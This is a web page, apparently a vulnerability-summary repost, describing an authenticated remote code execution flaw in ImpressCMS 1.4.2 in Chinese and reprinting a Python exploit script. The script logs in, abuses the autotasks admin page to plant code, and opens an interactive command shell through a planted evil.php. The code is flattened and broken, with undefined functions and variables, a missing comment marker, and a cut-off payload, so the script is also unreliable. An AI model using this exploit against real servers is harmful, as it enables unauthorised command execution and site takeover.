ImpressCMS 1.4.2 Authenticated Remote Code Execution (RCE) Vulnerability Analysis

ImpressCMS 1.4.2 远程代码执行漏洞 (RCE) 总结 漏洞概述 ImpressCMS 1.4.2 存在远程代码执行漏洞。由于自动任务（Autotask）配置不当，攻击者可以通过构造恶意请求在服务器上执行任意命令。 影响范围 软件名称: ImpressCMS 受影响版本: 1.4.2 漏洞类型: 远程代码执行 (RCE) 利用条件: 需要认证（Authenticated） 平台: PHP 修复方案 升级 ImpressCMS 到最新版本 检查并修复自动任务配置 限制对 等敏感文件的访问 POC代码 ```python Exploit Title: ImpressCMS 1.4.2 - Remote Code Execution (RCE) (Authenticated) Date: 15-09-2021 Exploit Author: Halit AKAYDIN (NlTAkydn) Vendor Homepage: https://www.impresscms.org/ Software Link: https://www.impresscms.org/modules/downloads/ Version: 1.4.2 Category: Webapps Tested on: Linux/Windows ImpressCMS is a multilingual content management system for the web Contains an endpoint that allows remote access Autotask page misconfigured, causing security vulnerability import argparse import requests import time parser = argparse.ArgumentParser(description="ImpressCMS version 1.4.2 - Remote Code Execution (Authenticated)") parser.add_argument('-u', '--login', type=str, required=True) parser.add_argument('-p', '--password', type=str, required=True) args = parser.parse_args() print("\nImpressCMS Version 1.4.2 - Remote Code Execution (Authenticated)\n", "\nExploit Author: Halit AKAYDIN (NlTAkydn)\n") exploit(args) def countdown(time_sec): while time_sec: mins, secs = divmod(time_sec, 60) timeformat = '{:02d}:{:02d}'.format(mins, secs) print('\r[+] Timeformat: ' + timeformat + ' The task is expected to run!', end='\r') sleep(1) time_sec -= 1 def exploit(args): #Check http or https if args.host.startswith('http://', 'https://'): print('[+] Check url...\n') args.host = args.host if args.host.endswith('/'): args.host = args.host[:-1] sleep(2) else: print('\n[!] Check Address...\n') args.host = 'http://' + args.host args.host = args.host if args.host.endswith('/'): args.host = args.host[:-1] sleep(2) try: response = requests.get(args.host) if response.status_code != 200: print('[-] Address not reachable!') sleep(2) exit(1) except requests.ConnectionError as exception: print('[-] Address not reachable') exit(1) response = requests.get(args.host + "/evil.php") if response.status_code == 200: print('[+] Exploit file exists!\n') sleep(2) print('[+] Exploit Done!\n') while True: cmd = input('$ ') url = args.host + "/evil.php?cmd=" + cmd headers = { "Upgrade-Insecure-Requests": "1", "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0" } response = requests.post(url, headers=headers, timeout=5) if response.text == '': print(cmd + ': command not found\n') else: print(response.text) else: #Login and set cookie url = args.host + "/user.php" cookies = { 'ICMSESSION': 'gjj2svl7qjqrj5rs076thm15' } headers = { "Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "Origin": args.host, "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9", "Referer": args.host, "Accept-Encoding": "gzip, deflate", "Accept-Language": "en-US,en;q=0.9", "Connection": "close" } data = { "uname": args.login, "pass": args.password, "xoops_redirect": "/", "op": "login" } response = session.post(url, headers=headers, cookies=cookies, data=data, allow_redirects=False) new_cookies = session.cookies.get('ICMSESSION') if (new_cookies is None): print('[-] Login Failed...\n') print('Your username or password is incorrect.') sleep(2) exit(1) else: print('[+] Success Login...\n') sleep(2) Create Tasks url = args.host + "/modules/system/admin.php?fct=autotasks&op=mod" cookies = { 'ICMSESSION': new_cookies } headers = { "Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "Origin": args.host, "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryZ2HA91yN08FWP2zk", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9", "Referer": args.host + "/modules/system/admin.php?fct=autotasks&op=mod", "Accept-Encoding": "gzip, deflate", "Accept-Language": "en-US,en;q=0.9", "Connection": "close" } data = '------WebKitFormBoundaryZ2HA91yN08FWP2zk\r\nContent-Disposition: form-data; name="sat_id"\r\n\r\n\r\n\r\n------WebKitFormBoundaryZ2HA91yN08FWP2zk\r\nContent-Disposition: form-data; name="sat_lastRunTime"\r\n\r\n\r\n\r\n------WebKitFormBoundaryZ2HA91yN08FWP2zk\r\nContent-Disposition: form-data; name="sat_name"\r\n\r\n\r\n\r\n------WebKitFormBoundaryZ2HA91yN08FWP2zk\r\nContent-Disposition: form-data; name="sat_code"\r\n\r\n\r\n\r\n------WebKitFormBoundaryZ2HA91yN08FWP2zk\r\nContent-Disposition: form-data; name="sat_enabled"\r\n\r\n------WebKitFormBoundaryZ2HA91yN08FWP2zk\r\nContent-Disposition: form-data; name="sat_repeat"\r\n\r\n\r\n\r\n------WebKitFo

目標達成すべての支援者に感謝 — 100%達成しました！

ImpressCMS 1.4.2 Authenticated Remote Code Execution (RCE) Vulnerability Analysis

このソースからの他の記事

目標達成 すべての支援者に感謝 — 100%達成しました！

ImpressCMS 1.4.2 Authenticated Remote Code Execution (RCE) Vulnerability Analysis

このソースからの他の記事

目標達成すべての支援者に感謝 — 100%達成しました！